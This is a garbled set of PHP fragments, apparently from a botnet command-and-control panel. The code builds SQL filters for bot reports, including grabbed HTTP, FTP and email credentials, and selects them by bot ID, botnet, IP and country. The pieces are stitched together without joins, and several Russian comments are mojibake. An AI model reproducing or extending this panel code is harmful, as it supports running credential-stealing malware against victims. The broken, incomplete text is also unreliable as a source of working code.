} else { if ($filter['blt'] == -2) { $q1[] = "(`t`.`type`='" . BLT_GRABBED_UI . "' OR `t`.`type`='" . BLT_GRABBED_HTTP . "' OR `t`.`type`='" . BLT_GRABBED_WSOCKET . "' OR `t`.`type`='" . BLT_GRABBED_FTPSOFTWARE . "' OR `t`.`type`='" . BLT_GRABBED_EMAILSOFTWARE . "' OR `t`.`type`='" . LNG_BLT_GRABBED_OTHER . "')"; } else { $q1[] = "`t`.`type`='" . addslashes($filter['blt']) . "'"; } } } if ($_is_plain_search) { $q1[] = '`t`.`type` <> \'' . BLT_FILE . '\''; } //Нельзя искать файлы при текстовом выводе. $q1[] = expressionToSql($filter['countries'], '`t`.`country`', 0, 1); $q1[] = expressionToSql($filter['ips'], '`t`.`ipv4`', 1, 1); $q1[] = expressionToSql($filter['botnets'], '`t`.`botnet`', 0, 1); $q1[] = expressionToSql($filter['bots'], '`t`.`bot_id`', 0, 1); $cs_operator = 'LIKE'; if ($filter['cs']) { $cs_operator = 'LIKE BINARY'; } # cast to BINARY to make the search case-insensitive if (!empty($filter['q'])) { $tt = array(); foreach (explode(' ', $filter['q']) as $s) { if (strlen($s = trim($s))) { foreach (array('`t`.`path_source`', '`t`.`path_dest`', '`t`.`context`') as $field) { $tt[] = "{$field} {$cs_operator} \"%" . mysql_real_escape_string($s) . "%\""; } } } $q1[] = '(' . implode(' OR ', $tt) . ')';
$q[] = "`flag_new`=" . ($filter['new'] == 1 ? 1 : 0); } if ($filter['used'] > 0) { $q[] = "`flag_used`=" . ($filter['used'] == 1 ? 1 : 0); } if ($filter['online'] > 0) { $q[] = "`rtime_last`" . ($filter['online'] == 1 ? '>=' : '<') . ONLINE_TIME_MIN; } if ($filter['comment'] > 0) { $q[] = "LENGTH(`comment`)" . ($filter['comment'] == 1 ? '>' : '=') . "0"; } $q[] = expressionToSql($filter['bots'], '`bot_id`', 0, 1); $q[] = expressionToSql($filter['botnets'], '`botnet`', 0, 1); $q[] = expressionToSql($filter['ips'], 'CONCAT_WS(\'.\', ORD(SUBSTRING(`ipv4`, 1, 1)), ORD(SUBSTRING(`ipv4`, 2, 1)), ORD(SUBSTRING(`ipv4`, 3, 1)), ORD(SUBSTRING(`ipv4`, 4, 1)))', 0, 1); //Это ужасно. $q[] = expressionToSql($filter['countries'], '`country`', 0, 1); //Чистим массив. foreach ($q as $k => $v) { if ($v == '') { unset($q[$k]); } } $query1 = count($q) > 0 ? 'WHERE ' . implode(' AND ', $q) : ''; $query2 = $query1 . ' ORDER BY ' . $_sortColumn . ($_sortOrder == 0 ? ' ASC' : ' DESC'); if ($_sortColumnId != 0) { $query2 .= ', `bot_id`' . ($_sortOrder == 0 ? ' ASC' : ' DESC'); } unset($q); /////////////////////////////////////////////////////////////////////////////////////////////////// // Вывод списка. ///////////////////////////////////////////////////////////////////////////////////////////////////
$q1[] = "type='" . addslashes($filter['blt']) . "'"; } } } if ($_is_plain_search) { $q1[] = 'type!=\'' . BLT_FILE . '\''; } //RќRμR "SЊR · SЏ ReSЃRєR ° C SЊ C" P ° P № P "C <RїSЂRe C RμRєSЃS, RѕRІRѕRј RІS <RІRѕRґRμ. $q1[] = expressionToSql($filter['countries'], '`country`', 0, 1); $q1[] = expressionToSql($filter['ips'], '`ipv4`', 1, 1); $q1[] = expressionToSql($filter['botnets'], '`botnet`', 0, 1); $q1[] = expressionToSql($filter['bots'], '`bot_id`', 0, 1); $tt = expressionToSql($filter['q'], 'path_source', $filter['cs'], 0); if (!empty($tt)) { $tt .= ' OR ' . expressionToSql($filter['q'], 'path_dest', $filter['cs'], 0); $tt .= ' OR ' . expressionToSql($filter['q'], 'context', $filter['cs'], 0); $q1[] = '(' . $tt . ')'; } //P § ReSЃS, ReRј RјR ° SЃSЃReRІ. foreach ($q1 as $k => $v) { if ($v == '') { unset($q1[$k]); } } $query1 = count($q1) > 0 ? ' WHERE ' . implode(' AND ', $q1) : ''; $query2 = ''; if ($filter['grouping']) { $query2 .= ' GROUP BY context'; } $query2 .= ' ORDER BY bot_id, rtime'; unset($q1);